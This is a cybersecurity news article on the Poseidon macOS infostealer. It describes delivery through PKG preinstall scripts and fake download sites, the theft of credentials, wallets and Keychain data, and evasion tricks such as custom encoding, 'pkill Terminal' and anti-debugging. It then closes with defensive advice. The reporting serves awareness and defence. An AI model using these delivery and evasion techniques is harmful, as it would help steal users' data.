Poseidon Mac Malware Hiding Within PKG Files to Evade Detections

A recent discovery by cybersecurity researchers has revealed that the Poseidon malware, a macOS-targeting trojan, is leveraging PKG files with preinstall scripts to infiltrate systems.

This malware, weighing only 207 bytes, is currently undetected by VirusTotal and represents a significant threat to Mac users.

The preinstall script embedded in the PKG file serves as a delivery mechanism, allowing the malware to download and execute malicious payloads on unsuspecting victims’ devices.

Poseidon is part of the growing Malware-as-a-Service (MaaS) ecosystem and has been active since mid-2024.

It is designed to steal sensitive user data, including browser credentials, cryptocurrency wallet information, and system files.

The malware employs sophisticated techniques such as anti-debugging measures and custom encoding algorithms to evade detection and complicate analysis.

Infection Mechanism: From Fake Sites to Terminal Execution

Poseidon’s infection process often begins with malvertising campaigns.

Users are redirected to fake websites mimicking legitimate platforms, such as the DeepSeek or Arc browser sites.

These websites trick users into downloading malicious DMG or PKG files disguised as legitimate applications.

Once downloaded, the malware exploits macOS GateKeeper bypass techniques by directing users to execute scripts via Terminal.

This method allows Poseidon to circumvent macOS security features and gain unauthorized access to the system.

The preinstall script within the PKG file is particularly concerning.

It executes commands during installation to download additional payloads or directly install the malware.

Once active, Poseidon exfiltrates data from specific directories (e.g., Desktop, Downloads) and targets file types like “txt,” “pdf,” “docx,” and cryptocurrency-related extensions.

It also gathers system information, accesses Keychain data, and attempts to retrieve Chrome Safe Storage keys without user consent.

Advanced Evasion Techniques

Poseidon employs several advanced evasion tactics to remain undetected:

• Encoding and Encryption: The malware uses custom Base64 encoding and hexadecimal strings for payload delivery.
• Terminal Manipulation: Commands like “disown” and “pkill Terminal” allow it to run in the background while hiding its activity from users.
• Anti-Debugging Measures: Poseidon detects sandbox environments or debugging tools and terminates itself if such conditions are identified.

These techniques make it challenging for researchers and antivirus software to analyze or intercept its operations effectively.

According to the Report, Poseidon has emerged as one of the most active macOS infostealers, accounting for 70% of detections in late 2024.

Its ability to bypass traditional security measures highlights the evolving sophistication of macOS-targeted malware.

Users are advised to exercise caution when downloading software from unfamiliar sources and avoid executing scripts in Terminal unless absolutely necessary.

To mitigate risks, users should implement robust endpoint protection solutions, maintain regular software updates, and use tools like Malwarebytes for Mac to detect and remove threats like Poseidon.

Collect Threat Intelligence on the Latest Malware and Phishing Attacks with ANY.RUN TI Lookup -> Try for free